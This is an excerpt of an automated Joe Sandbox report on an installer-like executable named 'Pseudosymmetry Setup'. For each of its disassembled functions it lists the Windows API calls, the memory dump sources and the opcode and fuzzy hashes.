GetWindowLongA.USER32(?,000000EB), ref: 00403F03
GetSysColor.USER32(00000000), ref: 00403F1F
SetTextColor.GDI32(?,00000000), ref: 00403F2B
SetBkMode.GDI32(?,?), ref: 00403F37
GetSysColor.USER32(?), ref: 00403F4A
SetBkColor.GDI32(?,?), ref: 00403F5A
DeleteObject.GDI32(?), ref: 00403F74
CreateBrushIndirect.GDI32(?), ref: 00403F7E

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction ID: 0203d41d11b8997b99186d389223a7b6b7934b4d059f66b1a69252c0c80ebb8f
Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
Instruction Fuzzy Hash: F6218471904745ABCB219F68DD48B4BBFF8AF01715F048A29EC95E22E1C738EA04CB65

Function 10002218 Relevance: 10.6, APIs: 7, Instructions: 136memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 100022CD
GlobalAlloc.KERNEL32(00000040,?), ref: 100022F7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1000230C
GlobalAlloc.KERNEL32(00000040,00000010), ref: 1000231B
CLSIDFromString.OLE32(00000000,00000000), ref: 10002328
GlobalFree.KERNEL32(00000000), ref: 1000232F
GlobalFree.KERNEL32(00000000), ref: 10002366

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234

Memory Dump Source

Source File: 00000001.00000002.13297986695.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.13297947944.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298021849.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.13298062331.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_temp_executable.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
String ID:
API String ID: 3955009414-0
Opcode ID: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
Instruction ID: 8b241ec9b16495ad6526e456ecf9fe23ef16db2f5f6b1e36baefbe8d682bcded
Opcode Fuzzy Hash: 69aff648fa357728dc284a58534689404649d34245d0df12f916c92667a5c5b3
Instruction Fuzzy Hash: 2A417C71509301EFF760DF648888B6AB7ECFB443D1F218929F946D6199DB34AA40CB61

Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
GlobalFree.KERNEL32(?), ref: 0040272C
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
GlobalFree.KERNEL32(00000000), ref: 00402745
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 49055fb6b2c3bc320b1256f847f53a0fb84ebbb1f39a9992b20644ddf58d0fb2
Instruction ID: 3852b7668eb2638a640f728426397d6192e80a26e925a200138047876d2d45ee
Opcode Fuzzy Hash: 49055fb6b2c3bc320b1256f847f53a0fb84ebbb1f39a9992b20644ddf58d0fb2
Instruction Fuzzy Hash: 96317A71C00128BBDF216FA5CD89DAE7E79EF08364F10422AF920762E0D6795D419BA9

Function 00404E7C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429000,00000000,0041AFD0,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000,?), ref: 00404EB5
lstrlenA.KERNEL32(00402FBC,00429000,00000000,0041AFD0,764D23A0,?,?,?,?,?,?,?,?,?,00402FBC,00000000), ref: 00404EC5
lstrcatA.KERNEL32(00429000,00402FBC,00402FBC,00429000,00000000,0041AFD0,764D23A0), ref: 00404ED8
SetWindowTextA.USER32(00429000,00429000), ref: 00404EEA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F10
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F2A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F38

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: da25758ff77001f8ee08d8ede5d2d983a8fe2c8000e2bc2a3511aae1abe8cb5f
Instruction ID: bec9e42dfe10d11ae3f9da453690961036ef7877893a7332badb98976ce689fd
Opcode Fuzzy Hash: da25758ff77001f8ee08d8ede5d2d983a8fe2c8000e2bc2a3511aae1abe8cb5f
Instruction Fuzzy Hash: 6B218C71D00118BADF119FA5CC80E9EBFB9EF44358F00807AF944B6291C739AE40CBA8

Function 00404747 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404762
GetMessagePos.USER32 ref: 0040476A
ScreenToClient.USER32(?,?), ref: 00404784
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404796
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047BC

Strings

f, xrefs: 00404798

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction ID: c5a6753d0d9a08ec20861e0abf538a780563573202a5f4a853919173bafec1ff
Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
Instruction Fuzzy Hash: 1F015275D00218BADB01DB94DC45FFEBBBCAF55711F10412BBA10B71C0C7B865018BA5

Function 00402B42 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
MulDiv.KERNEL32(0010B165,00000064,0010C458), ref: 00402B88
wsprintfA.USER32 ref: 00402B98
SetWindowTextA.USER32(?,?), ref: 00402BA8
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BBA

Strings

verifying installer: %d%%, xrefs: 00402B92

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
Instruction ID: 73eba29f4f71f0575b3f4d6169dd72a4e637aea185fae63b28e602e2a4acafde
Opcode Fuzzy Hash: 617ddd64424c569eed37efdba56663e5011ffbcc16745b9a1190651759ad78bb
Instruction Fuzzy Hash: 91016770A40208BBDF249F60DD09EEE3779AB00745F008039FA06F52D0D7B5A951CF99

Function 00402A3D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A5E
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
RegCloseKey.ADVAPI32(?), ref: 00402AA3
RegCloseKey.ADVAPI32(?), ref: 00402AC8
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
Instruction ID: 4f9eb0324db645217cd312817ce5f5f90673302cc8682bf6f7f2a23cea7074e4
Opcode Fuzzy Hash: 6128ad1f95e0d45aeb4fc038169a3f4e17ade998af3df8cbe34db4d02bca8b11
Instruction Fuzzy Hash: A3114C75A00008FFDF21AF90DE49EAF3B6DEB54348B104036FA05B10A0DBB49E51AF69

Function 00401CCC Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CD0
GetClientRect.USER32(00000000,?), ref: 00401CDD
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
DeleteObject.GDI32(00000000), ref: 00401D1B

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 95477192b4ddec384c0924bacadda81c6fdd173c179a066830d31e5e10276181
Instruction ID: a37ff7ddff9b943901b48b8e13d91397296dd9e34982c61b5f8f3387a39b4807
Opcode Fuzzy Hash: 95477192b4ddec384c0924bacadda81c6fdd173c179a066830d31e5e10276181
Instruction Fuzzy Hash: D8F012B2A05115BFE701EBA4EE89DAF77BCEB44301B108576F501F2191C7749D018B79

Function 00404665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429820,00429820,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404585,000000DF,0000040F,00000400,00000000), ref: 004046F3
wsprintfA.USER32 ref: 004046FB
SetDlgItemTextA.USER32(?,00429820), ref: 0040470E

Strings

%u.%u%s%s, xrefs: 004046DD

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2b51a4659b3896669eb4823acd47a2d31c81ce241aaf8c7cf193a0d5f8863a8f
Instruction ID: 3575eb730b5e41c4f883d25dacfc3cf5faa310bf85eded31aa5be4b75c6b21fc
Opcode Fuzzy Hash: 2b51a4659b3896669eb4823acd47a2d31c81ce241aaf8c7cf193a0d5f8863a8f
Instruction Fuzzy Hash: 97110473A001243BEB0066699C05EAF369DCBC6334F14463BFA25F61D1E9B9AD1186E9

Function 004038DF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,Pseudosymmetry Setup), ref: 00403977

Strings

"C:\Users\user\AppData\Local\Temp\temp_executable.exe" , xrefs: 004038E0
1033, xrefs: 004038E3, 004038ED, 0040395E
Pseudosymmetry Setup, xrefs: 00403966

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\AppData\Local\Temp\temp_executable.exe" $1033$Pseudosymmetry Setup
API String ID: 530164218-3719221603
Opcode ID: f86f56a9df3fcc333aaaa54e7aa9f96eb508d0daa0343c47a2c4b7c3e9f4b4ae
Instruction ID: 4a0247ebeee86d9d37c19e51f14e2d278c467c24f84ed2d5aa0d1d46c6847925
Opcode Fuzzy Hash: f86f56a9df3fcc333aaaa54e7aa9f96eb508d0daa0343c47a2c4b7c3e9f4b4ae
Instruction Fuzzy Hash: 9E11D475B006018BC730EF56DC909737BADEB89716368417FFC0167390C679AD028B98

Function 00403585 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,764D3410,0040355D,004033A1,?), ref: 0040359F
GlobalFree.KERNEL32(006C7440), ref: 004035A6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
@tl, xrefs: 00403586, 004035B1

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: @tl$C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-1640997295
Opcode ID: 419bff3280ce76e45398024eeeb67ca1fd65b3cfe8a035b33e31a73ff98b0390
Instruction ID: 5ca95732a304e18412054ab77c0ab83252b312de05b54ef578a8e1efb138fc3f
Opcode Fuzzy Hash: 419bff3280ce76e45398024eeeb67ca1fd65b3cfe8a035b33e31a73ff98b0390
Instruction Fuzzy Hash: BAE08C32902520A7C6619F54AD0875AB768AB8CB22F16003BE8007B2A0C7742D428A88

Function 00405621 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405627
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764D3410,00403294), ref: 00405630
lstrcatA.KERNEL32(?,00409014), ref: 00405641

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405621

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction ID: 2867520efe4a73b412c28396778f72c18efdc293359581d751bf97dd4c525389
Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
Instruction Fuzzy Hash: 59D0A962A099302AE21226158C05E8B3A28CF42351B040032F200F22A2CA3C2D428FFE

Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B

Part of subcall function 00405AEF: wsprintfA.USER32 ref: 00405AFC

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
Instruction ID: 9073a6d5dd373040739bd7ba49bf73079916e51ed90b12fbca594bab97ee4bd6
Opcode Fuzzy Hash: cace7886c37df806d23d68713c76842240f32c803d3675d518c14a9b2c7f411b
Instruction Fuzzy Hash: 51117071A00108BEDB01EFA5DD81DAEBBB9EF04344F20807AF505F21A1D7389E54DB28

Function 00402BC5 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402DA5,00000001), ref: 00402BD8
GetTickCount.KERNEL32 ref: 00402BF6
CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C13
ShowWindow.USER32(00000000,00000005), ref: 00402C21

Memory Dump Source

Source File: 00000001.00000002.13291985740.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.13291900588.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292052159.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000409000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.000000000043E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292112907.0000000000442000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.13292357718.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_temp_executable.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 8e1a153b6baf7225986f69e5dd5ed06818297ecf10932b303fd4fb5ac59aa631
Instruction ID: 1e461717de66f8227c62b67df7ec3c369d4a9b771999132610b492aaebc5c7f7
